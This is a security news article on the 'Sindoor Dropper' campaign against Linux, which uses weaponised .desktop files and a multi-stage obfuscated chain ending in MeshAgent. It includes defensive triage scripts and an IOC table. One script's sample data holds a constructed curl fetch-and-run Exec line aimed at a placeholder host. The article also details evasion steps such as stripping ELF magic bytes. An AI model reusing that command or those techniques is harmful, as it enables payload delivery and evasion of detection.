A new malware campaign, dubbed “Sindoor Dropper,” is targeting Linux systems using sophisticated spear-phishing methods and a multi-stage infection chain.
The campaign leverages lures themed around the recent India-Pakistan conflict, known as Operation Sindoor, to entice victims into executing malicious files.
This activity’s standout characteristic is its reliance on weaponized .desktop files, a technique previously associated with the advanced persistent threat (APT) group APT36, also known as Transparent Tribe or Mythic Leopard.
The attack begins when a user opens a malicious .desktop file, named “Note_Warfare_Ops_Sindoor.pdf.desktop,” which masquerades as an ordinary PDF document.
According to Nextron Systems’ analysis, upon execution it opens a benign decoy PDF to maintain the illusion of legitimacy while silently initiating a complex, heavily obfuscated infection process in the background.
‘Sindoor Dropper’ Malware Targets Linux Systems
This process is designed to evade both static and dynamic analysis, with the initial payload reportedly having zero detections on VirusTotal at the time of its discovery.
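The lure described above relies on a .desktop entry that looks like a document but runs a shell command. The following triage script is an added example for defenders, not code from the article or from Nextron: it parses a .desktop file and reports the masquerading signals a reviewer would look for (a document extension in front of .desktop, a document-style Name or Icon on an Application entry, and an Exec line that launches a shell or staging tools). The sample .desktop text is constructed for the demonstration; its Exec line points at a reserved .invalid domain and is not the campaign’s command line.

```python
import configparser
import re
from pathlib import PurePath

# Constructed sample input (not a file from the campaign): a .desktop entry
# shaped like the lure the article describes. The Exec line is illustrative
# and points at a reserved .invalid domain.
SAMPLE_DESKTOP_NAME = "Note_Warfare_Ops_Sindoor.pdf.desktop"
SAMPLE_DESKTOP_TEXT = """[Desktop Entry]
Type=Application
Name=Note_Warfare_Ops_Sindoor.pdf
Icon=application-pdf
Terminal=false
Exec=bash -c "xdg-open /tmp/Note_Warfare.pdf; curl -s https://example.invalid/a -o /tmp/a; chmod +x /tmp/a; /tmp/a"
"""

# Extensions a user would expect to open a document, not launch a program.
DOC_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx", ".odt", ".txt"}
# Icon names that make an Application entry look like a document in a file manager.
DOC_ICON_HINTS = ("pdf", "office", "document", "text-x")
# A shell being launched from Exec, or a "-c" inline script.
SHELL_RE = re.compile(r"(?:^|[\s/])(?:ba|z|da)?sh\b|\s-c\s")
# Tools a dropper typically needs to fetch, decode and stage a payload.
TOOL_RE = re.compile(r"\b(curl|wget|base64|printf|chmod|dd|python3?|perl)\b")


def parse_desktop(text):
    """Parse the [Desktop Entry] group; keys are case-sensitive in the spec."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str
    cp.read_string(text)
    return dict(cp["Desktop Entry"]) if cp.has_section("Desktop Entry") else {}


def triage_desktop(filename, text):
    """Return a list of human-readable findings; an empty list means nothing stood out."""
    findings = []
    suffixes = [s.lower() for s in PurePath(filename).suffixes]
    if len(suffixes) >= 2 and suffixes[-1] == ".desktop" and suffixes[-2] in DOC_EXTENSIONS:
        findings.append("double extension: document type before .desktop")

    entry = parse_desktop(text)
    if PurePath(entry.get("Name", "")).suffix.lower() in DOC_EXTENSIONS:
        findings.append("Name field ends in a document extension")
    icon = entry.get("Icon", "").lower()
    if entry.get("Type") == "Application" and any(h in icon for h in DOC_ICON_HINTS):
        findings.append("Application entry uses a document icon")

    exec_line = entry.get("Exec", "")
    if SHELL_RE.search(exec_line):
        findings.append("Exec launches a shell")
    tools = sorted(set(TOOL_RE.findall(exec_line)))
    if tools:
        findings.append("Exec calls staging tools: " + ", ".join(tools))
    return findings


def is_suspicious(filename, text, threshold=2):
    """Two or more independent signals is the (tunable) alerting threshold."""
    return len(triage_desktop(filename, text)) >= threshold


if __name__ == "__main__":
    for finding in triage_desktop(SAMPLE_DESKTOP_NAME, SAMPLE_DESKTOP_TEXT):
        print("-", finding)
```

Run it over files dropped into ~/Downloads, ~/Desktop or ~/.local/share/applications; legitimate launchers such as an editor’s gedit.desktop produce no findings, while the constructed lure trips every check. The threshold is deliberately two signals rather than one, because a single hint (for example a document icon) is common in benign entries.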
The .desktop file downloads several components, including an AES decryptor (mayuw) and an encrypted downloader (shjdfhd).
The decryptor, a UPX-packed Go binary, is deliberately corrupted by stripping its ELF magic bytes, likely to bypass security scans on platforms like Google Docs. The .desktop file restores these bytes on the victim’s machine to make the binary executable again.
This kicks off a multi-stage process in which each component decrypts and runs the next. The chain includes basic anti-virtual-machine checks, such as verifying board and vendor names, blacklisting specific MAC address prefixes, and checking machine uptime.
All strings within the droppers are obfuscated using a combination of Base64 encoding and DES-CBC encryption to further hinder analysis.
The final payload is a repurposed version of MeshAgent, a legitimate open-source remote administration tool. Once deployed, MeshAgent connects to a command-and-control (C2) server hosted on an Amazon Web Services (AWS) EC2 instance at wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx.
This gives the attacker full remote access to the compromised system, enabling them to monitor user activity, move laterally across the network, and exfiltrate sensitive data, Nextron said.
The Sindoor Dropper campaign highlights an evolution in threat actor tradecraft, demonstrating a clear focus on Linux environments, which phishing campaigns have historically targeted less often.
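A binary whose ELF magic has been stripped is invisible to scanners that key only on the four leading bytes, but the rest of the ELF identification block is tightly constrained and still present. The following checker is an added example for defenders, not code from the article or from Nextron: it classifies a file as a normal ELF, an ELF whose magic was overwritten, an ELF whose magic was cut off, or not ELF at all, by validating EI_CLASS, EI_DATA, EI_VERSION, EI_OSABI, the zero EI_PAD bytes, e_type and e_machine at the offsets where they would sit in each case. The UPX marker check and the machine/type allow-lists are heuristics chosen here, and the test header is constructed, not taken from the campaign’s binaries.

```python
import struct

ELF_MAGIC = b"\x7fELF"
# e_machine values treated as plausible: x86, ARM, x86-64, AArch64, RISC-V.
KNOWN_MACHINES = {0x03, 0x28, 0x3E, 0xB7, 0xF3}
KNOWN_TYPES = {1, 2, 3}          # ET_REL, ET_EXEC, ET_DYN
MAX_OSABI = 0x12                 # highest ELFOSABI value in common use


def looks_like_ident_tail(tail):
    """Check the 16 bytes that follow the magic: e_ident[4:16], e_type, e_machine.

    These fields are tightly constrained (class/endianness are 1 or 2, version is
    1, EI_PAD is zero), so a match is a strong hint even when the magic is gone.
    """
    if len(tail) < 16:
        return False
    ei_class, ei_data, ei_version, ei_osabi = tail[0], tail[1], tail[2], tail[3]
    if ei_class not in (1, 2) or ei_data not in (1, 2) or ei_version != 1:
        return False
    # tail[4] is EI_ABIVERSION (any value); tail[5:12] is EI_PAD and must be zero.
    if ei_osabi > MAX_OSABI or any(tail[5:12]):
        return False
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack(endian + "HH", tail[12:16])
    return e_type in KNOWN_TYPES and e_machine in KNOWN_MACHINES


def classify_elf_header(data):
    """Return 'elf', 'elf-magic-overwritten', 'elf-magic-removed' or 'not-elf'."""
    if data[:4] == ELF_MAGIC and looks_like_ident_tail(data[4:20]):
        return "elf"
    if data[:4] != ELF_MAGIC and looks_like_ident_tail(data[4:20]):
        return "elf-magic-overwritten"      # rest of header intact, first four bytes replaced
    if looks_like_ident_tail(data[:16]):
        return "elf-magic-removed"          # rest of header intact, first four bytes cut off
    return "not-elf"


def has_upx_marker(data):
    """UPX stubs carry a literal 'UPX!' tag near the start of the file (heuristic)."""
    return b"UPX!" in data[:4096]


def scan_bytes(data):
    kind = classify_elf_header(data)
    return {
        "kind": kind,
        "upx": has_upx_marker(data),
        "suspicious": kind in ("elf-magic-overwritten", "elf-magic-removed"),
    }


def scan_file(path):
    """Read only the prefix needed for the checks; safe on large files."""
    with open(path, "rb") as fh:
        return scan_bytes(fh.read(4096))


def build_elf64_header(e_type=2, e_machine=0x3E):
    """Constructed 64-byte little-endian x86-64 ELF header for the self-test below."""
    ident = ELF_MAGIC + bytes([2, 1, 1, 0, 0]) + b"\x00" * 7
    rest = struct.pack("<HHIQQQIHHHHHH", e_type, e_machine, 1,
                       0x401000, 64, 0, 0, 64, 56, 0, 64, 0, 0)
    return ident + rest


if __name__ == "__main__":
    hdr = build_elf64_header()
    samples = [("intact", hdr), ("zeroed magic", b"\x00" * 4 + hdr[4:]), ("cut magic", hdr[4:])]
    for label, blob in samples:
        print(label, "->", scan_bytes(blob))
```

Point scan_file at anything written to /tmp or a download directory that has no recognised file type: a hit on the “magic-removed” or “magic-overwritten” class, especially together with the UPX marker, is worth quarantining before any launcher gets the chance to repair the header.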
IOCs for Sindoor Dropper
IOC Type | Indicator | Description
File Hash | 9943bdf1b2a37434054b14a1a56a8e67aaa6a8b733ca785017d3ed8c1173ac59 | Initial phishing payload (Note_Warfare_Ops_Sindoor.pdf.desktop)
File Hash | 9a1adb50bb08f5a28160802c8f315749b15c9009f25aa6718c7752471db3bb4b | Decrypted AES decryptor (mayuw)
File Hash | 0f4ef1da435d5d64ccc21b4c2a6967b240c2928b297086878b3dcb3e9c87aa23 | Stage 2 downloader (shjdfhd)
File Hash | 38b6b93a536cbab5c289fe542656d8817d7c1217ad75c7f367b15c65d96a21d4 | Stage 3 downloader (inter_ddns) and the decrypted MeshAgent payload (server2)
File Hash | 05b468fc24c93885cad40ff9ecb50594faa6c2c590e75c88a5e5f54a8b696ac8 | MeshAgent final payload (server2)
File Hash | ba5b485552ab775ce3116d9d5fa17f88452c1ae60118902e7f669fd6390eae97 | Decoy PDF document (/tmp/Note_Warfare.pdf)
Filename | Note_Warfare_Ops_Sindoor.pdf.desktop | The initial weaponized .desktop file used for phishing
Filename | /tmp/Note_Warfare.pdf | The benign decoy document shown to the victim
Filename | mayuw | AES decryptor payload
Filename | shjdfhd | Encrypted Stage 2 downloader
Filename | access | AES decryptor for the next stage
Filename | inter_ddns | Stage 3 downloader
Filename | server2 | The final MeshAgent payload
Network | wss://boss-servers.gov.in.indianbosssystems.ddns[.]net:443/agent.ashx | Command-and-control (C2) server URL for the MeshAgent payload
Network | indianbosssystems.ddns[.]net | Malicious C2 domain
Network | 54.144.107[.]42 | IP address of the C2 server, hosted on AWS
By combining timely, region-specific social engineering with advanced evasion techniques, the attackers increase their likelihood of successfully compromising sensitive networks.